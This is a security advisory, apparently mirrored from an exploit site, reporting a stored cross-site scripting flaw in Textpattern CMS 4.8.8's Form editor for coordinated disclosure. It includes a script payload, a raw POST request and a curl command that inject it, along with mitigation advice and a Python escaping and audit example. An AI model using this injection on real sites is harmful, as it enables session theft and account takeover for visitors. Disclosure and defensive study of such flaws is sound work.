## https://sploitus.com/exploit?id=5EE02097-0AB8-5A79-A825-5764C5265F57
# Textpattern CMS 4.8.8: Stored XSS Advisory
**Title:** Stored Cross-Site Scripting (Stored XSS) in Textpattern CMS, Form editor (`index.php?event=form`)
**Date:** 2025-09-17
**Author:** lyv404
**Vendor Homepage:** [https://textpattern.com/](https://textpattern.com/)
**Repository / Download:** [https://github.com/textpattern/textpattern](https://github.com/textpattern/textpattern)
**Product:** Textpattern CMS
**Version:** 4.8.8 (confirmed)
**Tested on:** Chrome 139 (Windows) / Burp Suite for request capture
---
## Summary / Impact
An authenticated user with privileges to create or edit forms (tested with an administrative account) can inject arbitrary HTML/JavaScript into the **Form code** field. The injected content is persisted in the database and later rendered on public pages without proper escaping. The malicious script executes in the browsers of any visitor who views or interacts with the form (including regular authenticated users and anonymous visitors). Possible impacts include session theft, CSRF chaining, data exfiltration and site defacement.
---
## Full Technical Description
**Product:** Textpattern CMS
**Affected version(s):** 4.8.8 (confirmed)
**Vulnerability type:** Stored Cross-Site Scripting (CWE-79)
**Conditions:**
* Authentication: Yes (privilege required: account that can create/edit forms; typically admin in tested instance).
* Vector: Web (admin panel).
* Location: persisted in the database and reflected on public pages that render the form.
## Reproduction (sanitized PoC)
1. Log in to the Textpattern admin panel:
```
http://<host>/textpattern-4.8.8/textpattern/index.php
```
2. Navigate to **Forms** → **New form** (or `?event=form` → New form).
3. In the **Form code** field paste the payload:
```html
<script>alert('XSS')</script>
```
4. Save the form.
5. Visit the public page that renders the form (e.g. the site root or the page where the form is embedded). The alert should execute for any visitor who opens or interacts with that page, demonstrating stored XSS.
## Sanitized raw HTTP request (example)
*Replace the placeholders (host, `txp_login`/`txp_login_public` cookies, `step` and `_txp_token`) with values from your instance before use.*
```
POST /textpattern-4.8.8/textpattern/index.php HTTP/1.1
Host: <host>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryExample
Cookie: txp_login=<redacted>; txp_login_public=<redacted>

------WebKitFormBoundaryExample
Content-Disposition: form-data; name="event"

form
------WebKitFormBoundaryExample
Content-Disposition: form-data; name="step"

<step>
------WebKitFormBoundaryExample
Content-Disposition: form-data; name="_txp_token"

<token>
------WebKitFormBoundaryExample
Content-Disposition: form-data; name="name"

poc-xss
------WebKitFormBoundaryExample
Content-Disposition: form-data; name="form_code"

<script>alert('XSS')</script>
------WebKitFormBoundaryExample--
```
## Sanitized curl example
```bash
curl -i -X POST "http://<host>/textpattern-4.8.8/textpattern/index.php" \
  -H "Cookie: txp_login=<redacted>; txp_login_public=<redacted>" \
  -F "event=form" \
  -F "step=<step>" \
  -F "_txp_token=<token>" \
  -F "name=poc-xss" \
  -F "form_code=<script>alert('XSS')</script>"
```
---
## Evidence / Screenshots (attach these files to the report)
1. `01_form_create.png`: Admin UI showing the payload inside the **Form code** field before saving.
2. `02_exploit_alert.png`: Public page showing the alert popup (regular user or anonymous view triggering the payload).
3. `03_burp_request.png`: Burp capture showing the POST request that created the form (sanitize cookies/tokens in the file you attach).
4. `04_db_evidence.png`: phpMyAdmin / SQL screenshot showing the stored payload in the DB row (or a sanitized `SELECT` output).
5. (Optional) `05_video_short.mp4`: 5-10 s recording: create form → visit public page → alert.
**Note:** sanitize all network captures and logs: replace live tokens/cookies with `<redacted>` before attaching.
---
## Verification Notes
* Verified trigger with a non-admin user: after creating the malicious form as admin, logging in as a regular user and opening the page with the form triggered the payload. This demonstrates that **creation requires elevated privilege but execution affects all viewers**.
* If triage requires proof of exfiltration or further proof-of-concept, provide full logs and DB export via PGP-encrypted channel (request recipient's PGP public key).
---
## Impact
Execution of attacker-controlled JavaScript in the browser of site visitors. Possible impacts include session token theft, CSRF chaining (performing privileged actions if an admin visits), credential/data exfiltration, account takeover when chained with other vulnerabilities, and site defacement.
---
## Mitigation recommendations
1. **Context-aware output encoding**: escape stored `form_code` when rendering (encode for HTML context).
2. **Server-side validation**: sanitize or whitelist allowed constructs in the Form code field (reject `<script>` tags).
3. **Privilege hardening & auditing**: restrict who can create/edit forms and log those actions.
4. **CSP**: add a restrictive Content Security Policy as defense-in-depth (not a replacement for proper escaping).
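The following is an added example, not code from the advisory or from Textpattern, illustrating recommendations 1 to 3 against the advisory's own payload: the unescaped rendering pattern beside an HTML-context escaped one (the Python equivalent of PHP's `htmlspecialchars()` with `ENT_QUOTES`), and an audit that flags stored form code carrying active content for review. The `SAMPLE_FORMS` rows are constructed and reuse the `name`/`form_code` field names from the POST request above; escaping suits a field rendered as text, while the audit is the useful check where the field must legitimately hold markup.

```python
import html
import re

# Constructed sample rows mirroring the fields sent by the advisory's POST
# (name, form_code). The second row carries the advisory's PoC payload.
SAMPLE_FORMS = [
    {"name": "default", "form_code": "<p><txp:body /></p>"},
    {"name": "poc-xss", "form_code": "<script>alert('XSS')</script>"},
    {"name": "links", "form_code": '<a href="/rss">Subscribe</a>'},
]


def render_unescaped(form_code: str) -> str:
    """Vulnerable pattern from the advisory: stored Form code is written
    into the public page verbatim, so any markup in it becomes live HTML."""
    return f'<div class="form">{form_code}</div>'


def render_html_escaped(form_code: str) -> str:
    """Mitigation 1 (context-aware output encoding) for an HTML text context.
    <, >, &, " and ' become entities, so the payload is displayed, not run."""
    return f'<div class="form">{html.escape(form_code, quote=True)}</div>'


# Mitigations 2 and 3 (validation and auditing): constructs that have no
# place in a form template unless explicitly intended. Matches are flagged
# for human review, because legitimate Textpattern forms do contain HTML.
ACTIVE_CONTENT = re.compile(
    r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE
)


def audit_forms(rows):
    """Return the names of stored forms whose code contains active content."""
    return [row["name"] for row in rows if ACTIVE_CONTENT.search(row["form_code"])]


if __name__ == "__main__":
    payload = SAMPLE_FORMS[1]["form_code"]
    print(render_unescaped(payload))     # <script> tag survives intact
    print(render_html_escaped(payload))  # &lt;script&gt;...: inert text
    print(audit_forms(SAMPLE_FORMS))     # ['poc-xss']
```

Run the audit against an export of the stored forms to find injected entries; the flagged names are the rows to inspect, not a verdict.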
---
## Disclosure / Contact
* **Vendor contacted:** [security@textpattern.com](mailto:security@textpattern.com) on 2025-09-17.
* **Requested:** coordinated disclosure and CVE assignment.
* **Researcher:** lyv404, [romulolyvio@gmail.com](mailto:romulolyvio@gmail.com)
---
## Attachments to include with this advisory (zip them)
* `01_form_create.png`
* `02_exploit_alert.png`
* `03_burp_request_sanitized.png`
* `04_db_evidence.png`
* `05_environment.txt` (Apache/PHP/Textpattern/browser + discovery date)
* `06_poc_request_sanitized.txt` (raw POST with `<redacted>` tokens)
---
*End of advisory.*